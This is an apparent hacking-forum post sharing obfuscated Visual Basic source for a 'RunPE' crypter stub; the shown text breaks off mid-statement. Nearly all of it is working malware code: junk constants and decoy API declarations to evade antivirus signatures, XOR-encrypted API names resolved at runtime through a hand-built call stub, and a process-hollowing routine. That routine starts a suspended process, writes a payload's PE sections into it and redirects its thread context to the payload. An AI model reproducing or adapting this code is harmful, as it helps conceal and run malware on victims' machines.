Runpe Mod K4

Iniciado por K4RUN4, Octubre 11, 2012, 05:04:34 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Octubre 11, 2012, 05:04:34 PM Ultima modificación: Mayo 12, 2014, 02:47:02 PM por Expermicid
Runpe Generador skyweb007
Código: vb

Private Const iTODXOFScMLkMiuJqI As Long = 884210437
Private Const oHlUFbB7c As Long = &H10007
Private Const KPoPaUmjGcBsoBRgCp As Long = 43885802

Private Const UdpSlRoHgHSMeNkUek As Long = 571456721
Private Const XkLbWZwT0 As Integer = 260
Private Const BvJabvwHeMpFlrLTJo As Long = 666743405

Private Const UZKDKoCBRUXPnDyfOQ As Long = 623572428
Private Const bTQl9oDeY As Long = &H4
Private Const rtZtAIvclmkpNTaFSR As Long = 667513285

Private Const PSKiMqoWLfWMakTTGH As Long = 670505035
Private Const E4r2NPXmu As Long = &H1000
Private Const gfkVOVAaMcfiacHqmb As Long = 865706641

Private Const kFYSInvwyBlelQdcsy As Long = 73541772
Private Const EQIAtwHT0 As Long = &H2000
Private Const NPHgynYGIcFKYUDQpp As Long = 346262605

Private Const PAHOeFFULNFeHljRGa As Long = 314522005
Private Const mvUSFCqYB As Long = &H40
Private Const qhYmvfeSFfCOcKbOSr As Long = 554761501


Private Declare Function FOZTxMgzSNCirs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function gZhKYQnrtlK Lib "winmm.dll" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
Private Declare Function CkmGjoCMhviUvRQtar Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function HitnFCZ Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function LHTkzUIRpkNPwQVeSzH Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Td57zdeAJ As String, ByVal irp2fgyco As String, ByVal RdLggVr0Q As Long, ByVal Fjn88KRAm As Long, ByVal VKa5eOX4s As Long, ByVal heV8nTQUC As Long, ByVal ofKb6Slk8 As Long, ByVal MCJpy2ujw As Long, jvQsfC7ZK As HvWIgrbaI, OpDxItsdy As Ikr1WTQJc) As Long
Private Declare Function LjqxbonDHKBbqjS Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function YAESOxLllLUhJd Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
Private Declare Function yYyJDVF Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function VcYkAPQZiFAegMSm Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function PKLJOzGN Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function ETJMEdGljQFaQH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long

Private Declare Function BdlxatZwObOMG Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function scnspARSopyQDhwdjCK Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function bcafPI Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
Private Declare Function UGQbdUuQBmh Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function hYlwfeRDfB Lib "winmm.dll" () As Long
Private Declare Function JbMQr Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal CE9yvfJTt As Long, b5IFtuNEU As Any, jJge24yxK As Any, ByVal U3W2edK9C As Long, fjly1tZq8 As Long) As Long
Private Declare Function QpmIfD Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function QTjEFOZTxMgzSN Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function rsqvgZh Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
Private Declare Function QnrtlKaRCkmGjoCMhviU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QtareiHitnFCZvTLHT Lib "gdi32" (ByVal hGDIObj As Long) As Long

Private Declare Function KFjlRlrzo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function echEKR Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
Private Declare Function IZdfQwLDoVYsUank Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function FFhpCey Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function TtTfZraxhrxtF Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function suDbVzBi Lib "winmm.dll" () As Long
Private Declare Function WSkaKIVom Lib "kernel32" Alias "OutputDebugStringA" (ByVal cgRmc7IJv As String) As Long
Private Declare Function PEkggfkUbjzaZpf Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function ycGEm Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function lcqAjjVQxGS Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function tRkvkhbtqNxHNJVmn Lib "gdi32" (ByVal hMetaFile As Long) As Long


Private Declare Function etagzHxdYYQcM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function rRDTQaRqTyieSneUi Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
Private Declare Function bOAcy Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function GYJNocaTmjFbzFBNQgBC Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QuJcwPKzfopnsdVdHUT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function qiHVOzhjD Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (AxGGLYZ7E As Any, d2l6uk0Pt As Any, ByVal l1p6nLoNB As Long)
Private Declare Function yJerfQsO Lib "winmm.dll" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
Private Declare Function QoaeEfqkC Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function sQIEPhwRFOmhKMtMSbP Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function FDIgmuYlkAEGyY Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function PxzTwB Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long

Private Declare Function CemzbuayPqQcV Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function tdouqBSipqAYSwyelEMB Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function dbgRY Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function QVmcfQvYDBj Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function iZnxggSSuC Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function CallWindowProcA Lib "USER32" (ByVal Tg75MhFRu As Long, ByVal gEdEnMOb8 As Long, ByVal EmFxf7Lra As Long, ByVal TNZRPnQNL As Long, ByVal wZ1lfnc1U As Long) As Long
Private Declare Function LqOgsheYqn Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function EKGSjkFHQoU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function vBUdRxttswibiMnZo Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function nLpTDzoIypD Lib "gdi32" (ByVal hColorSpace As Long) As Long

Private Declare Function ZvHVDUGKlZVP Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function CYwCyK Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function xzISN Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function ZtMGwcllkpaSaER Lib "winmm.dll" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function knfDSLv Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function AdivFbo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal qkrvtMeXS As Long, ByVal Sa39iyURB As String) As Long
Private Declare Function pLKmTlQbBbnhywSoM Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function MetOBLjeHJpJO Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function sBCAFdjqUihxADvUj Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function uwQtyLIrEeeFNbCQ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function rRsDx Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long

Private Declare Function VRduJQSczuYaGMgodI Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function DHtzGYyxNDGyQA Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
Private Declare Function KzTJAO Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function HuuVfrSnRqITIFz Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Private Declare Function mVgmiuKLhjsPxaqQd Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal SCgYSjXPN As String) As Long
Private Declare Function tZUUTZJCJoOAQT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function nQvfbPkbQfpYYKxZv Lib "winmm.dll" () As Long
Private Declare Function DUGKlZVPifCYwCyKNcx Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function SNrGZtMGwcllkpa Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long


Private ihwBEyUjcMuvRtMWrF As Long
Private eGcbDkCnrSrDvPNjFd As Double
Private SdWlHtEbWACiCIQFkt As String
Private swVbiNaZptynNcUFmo As Byte
Private Type tX1G1gc6e
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Private BjvWWwGTuPtSjKkypI As Long
Private OwIOKWmCJLUrmQSFYg As Double
Private BvvyAlrAQqpGyqPsXV As Boolean
Private rMCsHRAAmnOXjMfKiB As Currency
Private BwrKHeOYeamDEZbkIp As Date
Private iPVovlSNNMRCuCgHsJ As Currency
Private Type HvWIgrbaI
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private eJsodwnesDllYLmIVj As Date
Private iUYwmjdysQlKQMYbpL As Currency
Private WgaEUmHaUKpwCngnSe As Integer
Private uwBsRgZJqtOquJToCo As Integer
Private Type Ikr1WTQJc
CE9yvfJTt As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type

Private bJaMQqQbVnkIdCuqCT As Single
Private DqBYTvweEMChqqpuRY As Integer
Private KXWmpskJYRBjlGinBw As Integer
Private tTTuDQrLqPgHhsmFnK As String
Private FLHSjGHRojNPuCVcSw As String
Private Type rVuaHnLLV
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

Private ioyNnmDsynMoUSAoJp As Double
Private jSRFFgoBdvcBSeSQKc As Double
Private yfqvsEVWrsDaHkAgnG As Currency
Private EjefdiTNUwZKaehYwa As Byte
Private plZukbpAiiVIiFSgNf As Date
Private VujgaspMiHNJUXmIJT As Integer
Private Type vQYh9rmTo
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As rVuaHnLLV
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Private jEXRHmuytkdkPbbquw As Long
Private OdWGnqLnrGQllYAVUv As Integer
Private yhlLlvqJGdXPMXoDYM As Double
Private tnRTAUZhXDMMLPmtBf As Long
Private rHLOGetmWEHbEIWTCP As Long
Private oQYkNgMjCbCNHZJfPa As Integer
Private Type IG4wyJbPZ
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

Private uDEOlgKLrwRZPupqot As Integer
Private lsJkjAprjJlQOvkGym As Boolean
Private LttggIQdFYEctGtrlE As Boolean
Private XHSYUfvwTUeCiMbIPh As Long
Private Type yDQ4fPIlY
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

Private DBGqkrVvhwCFyVwdNJ As String
Private SINXGGsfGcpEkDosSH As Boolean
Private wQNjGekgruKfgqAuYo As Byte
Private buoeKSTRWIBImOSVNl As Boolean
Private tdLOiLPdnJWJyXsrUC As Date
Private Type opSQywttF
VirtualAddress As Long
Size As Long
End Type

Private JUOgdBWumiuMayjsRL As Long
Private qXrvFuajjimKRYDPPe As Single
Private ldCRKtbebftqZmMMny As Byte
Private kEjHZZkevgDmwDALcq As Boolean
Private Type nOr6mWzig
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As opSQywttF
End Type

Private EhiPVovmSNOMRCJQgI As Byte
Private XNPHgJnlUIdTKYiRRE As Byte
Private fnBcybARdRPJbYuepy As Long
Private DUVqrCZGjfmFNDidec As Single
Private Type zHimHxdyE
Signature As Long
FileHeader As yDQ4fPIlY
OptionalHeader As nOr6mWzig
End Type

Private SteuBsSuZKGtOFyKUD As Boolean
Private pcDZlAhlpPDBuNKgDb As Single
Private dorHcdnvrVkEXqlaGP As Date
Private OTEwFiyuLPRJiwpaIK As Integer
Private Type guWZ6IUxp
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type


Public Function u7tGsr9W3(ByVal qOLqmwZVA As String, ByVal ACzbFfGhs As String, ParamArray TLEEGE3BB()) As Long
Dim CUKQL As Long, zFt3quxBV(&HEC00& - 1) As Byte, HAB As Long, WMJGLUQ As Long

WMJGLUQ = GetProcAddress(LoadLibraryA(qOLqmwZVA), ACzbFfGhs)
If WMJGLUQ = 0 Then Exit Function

CUKQL = VarPtr(zFt3quxBV(0))
RtlMoveMemory ByVal CUKQL, &H59595958, &H4: CUKQL = CUKQL + 4
RtlMoveMemory ByVal CUKQL, &H5059, &H2: CUKQL = CUKQL + 2
For HAB = UBound(TLEEGE3BB) To 0 Step -1
RtlMoveMemory ByVal CUKQL, &H68, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, CLng(TLEEGE3BB(HAB)), &H4: CUKQL = CUKQL + 4
Next
RtlMoveMemory ByVal CUKQL, &HE8, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, WMJGLUQ - CUKQL - 4, &H4: CUKQL = CUKQL + 4
RtlMoveMemory ByVal CUKQL, &HC3, &H1: CUKQL = CUKQL + 1
u7tGsr9W3 = CallWindowProcA(VarPtr(zFt3quxBV(0)), 0, 0, 0, 0)
End Function

Public Function GCcQ9b7nT(ByVal iNLI3ostx As String, ByVal YIagFy1Sq As String) As String
Dim DELHfVCj8 As Long

For DELHfVCj8 = 1 To Len(iNLI3ostx)
GCcQ9b7nT = GCcQ9b7nT & Chr(Asc(Mid(YIagFy1Sq, IIf(DELHfVCj8 Mod Len(YIagFy1Sq) <> 0, DELHfVCj8 Mod Len(YIagFy1Sq), Len(YIagFy1Sq)), 1)) Xor Asc(Mid(iNLI3ostx, DELHfVCj8, 1)))
Next DELHfVCj8
End Function

Public Sub nJLJ0h51B(ByVal gAjHv5BEo As String, ByRef GelPTlshh() As Byte, LY7YFef3i As String)
Dim Puq626fXT As Long, WcURpueyC As IG4wyJbPZ, dxNCenpxr As zHimHxdyE, VBzOQVQxf As guWZ6IUxp
Dim ptLvXfllO As HvWIgrbaI, cQdlVdwtG As Ikr1WTQJc, sGbh6tdbF As vQYh9rmTo

ptLvXfllO.cb = Len(ptLvXfllO)
RtlMoveMemory WcURpueyC, GelPTlshh(0), 64
RtlMoveMemory dxNCenpxr, GelPTlshh(WcURpueyC.e_lfanew), 248

CreateProcessA gAjHv5BEo, kMIvzyLCQ(StrReverse(Chr$(41)), StrReverse(Chr$(57))) & LY7YFef3i, 0, 0, False, bTQl9oDeY, 0, 0, ptLvXfllO, cQdlVdwtG
u7tGsr9W3 GCcQ9b7nT(Chr(56) & Chr(58) & Chr(40) & Chr(39) & Chr(35), kMIvzyLCQ(StrReverse(Chr$(92) & Chr$(72) _
& Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) & Chr$(85) _
& Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) & Chr$(78) _
& Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) & Chr$(73) _
& Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) & Chr$(80) _
& Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(24) & Chr(58) & Chr(25) & Chr(37) & Chr(34) & Chr(34) & Chr(37) & Chr(14) & Chr(46) & Chr(53) & Chr(56) & Chr(10) & Chr(54) & Chr(29) & Chr(34) & Chr(33) & Chr(37) & Chr(34) & Chr(62) & Chr(57), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(0) & Chr(39) & Chr(62) & Chr(63) & Chr(58) & Chr(34) & Chr(57) & Chr(25) & Chr(43) & Chr(60) & Chr(32) & Chr(38) & Chr(21) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase, dxNCenpxr.OptionalHeader.SizeOfImage, E4r2NPXmu Or EQIAtwHT0, mvUSFCqYB
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase, GelPTlshh(0), dxNCenpxr.OptionalHeader.SizeOfHeaders, 0

For Puq626fXT = 0 To dxNCenpxr.FileHeader.NumberOfSections - 1
RtlMoveMemory VBzOQVQxf, GelPTlshh(WcURpueyC.e_lfanew + 248 + 40 * Puq626fXT), Len(VBzOQVQxf)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase + VBzOQVQxf.VirtualAddress, GelPTlshh(VBzOQVQxf.PointerToRawData), VBzOQVQxf.SizeOfRawData, 0
Next Puq626fXT

sGbh6tdbF.ContextFlags = oHlUFbB7c
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(17) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal sGbh6tdbF.Ebx + 8, dxNCenpxr.OptionalHeader.ImageBase, 4, 0
sGbh6tdbF.Eax = dxNCenpxr.OptionalHeader.ImageBase + dxNCenpxr.OptionalHeader.AddressOfEntryPoint
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(5) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
